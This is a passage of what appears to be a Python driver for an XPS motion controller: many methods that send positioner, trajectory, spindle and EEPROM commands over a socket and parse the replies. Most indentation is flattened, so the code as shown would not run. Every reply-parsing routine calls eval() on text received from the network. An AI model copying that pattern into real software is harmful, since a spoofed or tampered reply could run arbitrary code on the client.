# PositionersEncoderIndexDifferenceGet : Return the difference between index of primary axis and secondary axis (only after homesearch)
def PositionersEncoderIndexDifferenceGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionersEncoderIndexDifferenceGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaExactVelocityAjustedDisplacementGet : Return adjusted displacement to get exact velocity
def PositionerSGammaExactVelocityAjustedDisplacementGet (self, socketId, PositionerName, DesiredDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaExactVelocityAjustedDisplacementGet(' + PositionerName + ',' + str(DesiredDisplacement) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
    # PositionerSGammaParametersGet : Read dynamic parameters for one axis of a group for a future displacement
def PositionerSGammaParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
    # PositionerSGammaParametersSet : Update dynamic parameters for one axis of a group for a future displacement
def PositionerSGammaParametersSet (self, socketId, PositionerName, Velocity, Acceleration, MinimumTjerkTime, MaximumTjerkTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersSet(' + PositionerName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(MinimumTjerkTime) + ',' + str(MaximumTjerkTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerSGammaPreviousMotionTimesGet : Read SettingTime and SettlingTime
def PositionerSGammaPreviousMotionTimesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaPreviousMotionTimesGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerStageParameterGet : Return the stage parameter
def PositionerStageParameterGet (self, socketId, PositionerName, ParameterName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterGet(' + PositionerName + ',' + ParameterName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerStageParameterSet : Save the stage parameter
def PositionerStageParameterSet (self, socketId, PositionerName, ParameterName, ParameterValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterSet(' + PositionerName + ',' + ParameterName + ',' + ParameterValue + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherGet : Read time flasher parameters
def PositionerTimeFlasherGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerTimeFlasherSet : Set time flasher parameters
def PositionerTimeFlasherSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherEnable : Enable time flasher
def PositionerTimeFlasherEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherDisable : Disable time flasher
def PositionerTimeFlasherDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerUserTravelLimitsGet : Read UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerUserTravelLimitsSet : Update UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsSet (self, socketId, PositionerName, UserMinimumTarget, UserMaximumTarget):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsSet(' + PositionerName + ',' + str(UserMinimumTarget) + ',' + str(UserMaximumTarget) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetGet : Get DAC offsets
def PositionerDACOffsetGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetGet(' + PositionerName + ',short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetSet : Set DAC offsets
def PositionerDACOffsetSet (self, socketId, PositionerName, DACOffset1, DACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetSet(' + PositionerName + ',' + str(DACOffset1) + ',' + str(DACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetDualGet : Get dual DAC offsets
def PositionerDACOffsetDualGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualGet(' + PositionerName + ',short *,short *,short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetDualSet : Set dual DAC offsets
def PositionerDACOffsetDualSet (self, socketId, PositionerName, PrimaryDACOffset1, PrimaryDACOffset2, SecondaryDACOffset1, SecondaryDACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualSet(' + PositionerName + ',' + str(PrimaryDACOffset1) + ',' + str(PrimaryDACOffset2) + ',' + str(SecondaryDACOffset1) + ',' + str(SecondaryDACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorAutoTuning : Astrom&Hagglund based auto-tuning
def PositionerCorrectorAutoTuning (self, socketId, PositionerName, TuningMode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorAutoTuning(' + PositionerName + ',' + str(TuningMode) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAccelerationAutoScaling : Astrom&Hagglund based auto-scaling
def PositionerAccelerationAutoScaling (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAccelerationAutoScaling(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTVerification : Multiple axes PVT trajectory verification
def MultipleAxesPVTVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTVerificationResultGet : Multiple axes PVT trajectory verification result get
def MultipleAxesPVTVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# MultipleAxesPVTExecution : Multiple axes PVT trajectory execution
def MultipleAxesPVTExecution (self, socketId, GroupName, TrajectoryFileName, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTParametersGet : Multiple axes PVT trajectory get parameters
def MultipleAxesPVTParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTParametersGet(' + GroupName + ',char *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTPulseOutputSet : Configure pulse output on trajectory
def MultipleAxesPVTPulseOutputSet (self, socketId, GroupName, StartElement, EndElement, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputSet(' + GroupName + ',' + str(StartElement) + ',' + str(EndElement) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTPulseOutputGet : Get pulse output on trajectory configuration
def MultipleAxesPVTPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputGet(' + GroupName + ',int *,int *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# SingleAxisSlaveModeEnable : Enable the slave mode
def SingleAxisSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveModeDisable : Disable the slave mode
def SingleAxisSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersSet : Set slave parameters
def SingleAxisSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersGet : Get slave parameters
def SingleAxisSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# SpindleSlaveModeEnable : Enable the slave mode
def SpindleSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveModeDisable : Disable the slave mode
def SpindleSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersSet : Set slave parameters
def SpindleSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersGet : Get slave parameters
def SpindleSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupSpinParametersSet : Modify Spin parameters on selected group and activate the continuous move
def GroupSpinParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersSet(' + GroupName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupSpinParametersGet : Get Spin parameters on selected group
def GroupSpinParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinCurrentGet : Get Spin current on selected group
def GroupSpinCurrentGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinCurrentGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinModeStop : Stop Spin mode on selected group with specified acceleration
def GroupSpinModeStop (self, socketId, GroupName, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinModeStop(' + GroupName + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerification : XY trajectory verification
def XYLineArcVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerificationResultGet : XY trajectory verification result get
def XYLineArcVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcExecution : XY trajectory execution
def XYLineArcExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcParametersGet : XY trajectory get parameters
def XYLineArcParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcPulseOutputSet : Configure pulse output on trajectory
def XYLineArcPulseOutputSet (self, socketId, GroupName, StartLength, EndLength, PathLengthInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputSet(' + GroupName + ',' + str(StartLength) + ',' + str(EndLength) + ',' + str(PathLengthInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcPulseOutputGet : Get pulse output on trajectory configuration
def XYLineArcPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputGet(' + GroupName + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZGroupPositionCorrectedProfilerGet : Return corrected profiler positions
def XYZGroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY, PositionZ):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZGroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',' + str(PositionZ) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineVerification : XYZ trajectory verifivation
def XYZSplineVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineVerificationResultGet : XYZ trajectory verification result get
def XYZSplineVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineExecution : XYZ trajectory execution
def XYZSplineExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineParametersGet : XYZ trajectory get parameters
def XYZSplineParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# OptionalModuleExecute : Execute an optional module
def OptionalModuleExecute (self, socketId, ModuleFileName, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleExecute(' + ModuleFileName + ',' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# OptionalModuleKill : Kill an optional module
def OptionalModuleKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMCIESet : Set CIE EEPROM reference string
def EEPROMCIESet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMCIESet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDACOffsetCIESet : Set CIE DAC offsets
def EEPROMDACOffsetCIESet (self, socketId, PlugNumber, DAC1Offset, DAC2Offset):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDACOffsetCIESet(' + str(PlugNumber) + ',' + str(DAC1Offset) + ',' + str(DAC2Offset) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDriverSet : Set Driver EEPROM reference string
def EEPROMDriverSet (self, socketId, PlugNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDriverSet(' + str(PlugNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMINTSet : Set INT EEPROM reference string
def EEPROMINTSet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMINTSet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CPUCoreAndBoardSupplyVoltagesGet : Get power informations
def CPUCoreAndBoardSupplyVoltagesGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUCoreAndBoardSupplyVoltagesGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# CPUTemperatureAndFanSpeedGet : Get CPU temperature and fan speed
def CPUTemperatureAndFanSpeedGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUTemperatureAndFanSpeedGet(double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ActionListGet : Action list
def ActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ActionExtendedListGet : Action extended list
def ActionExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIExtendedListGet : API method list
def APIExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIListGet : API method list without extended API
def APIListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ControllerStatusListGet : Controller status list
def ControllerStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ErrorListGet : Error list
def ErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventListGet : General event list
def EventListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringListGet : Gathering type list
def GatheringListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExtendedListGet : Gathering type extended list
def GatheringExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalListGet : External Gathering type list
def GatheringExternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusListGet : Group status list
def GroupStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareInternalListGet : Internal hardware list
def HardwareInternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareInternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDriverAndStageGet : Smart hardware
def HardwareDriverAndStageGet (self, socketId, PlugNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDriverAndStageGet(' + str(PlugNumber) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ObjectsListGet : Group name and positioner name
def ObjectsListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ObjectsListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerErrorListGet : Positioner error list
def PositionerErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardwareStatusListGet : Positioner hardware status list
def PositionerHardwareStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverStatusListGet : Positioner driver status list
def PositionerDriverStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingActionListGet : Get referencing action list
def ReferencingActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingSensorListGet : Get referencing sensor list
def ReferencingSensorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingSensorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringUserDatasGet : Return user data values
def GatheringUserDatasGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringUserDatasGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxGet : Get controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxGet(double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
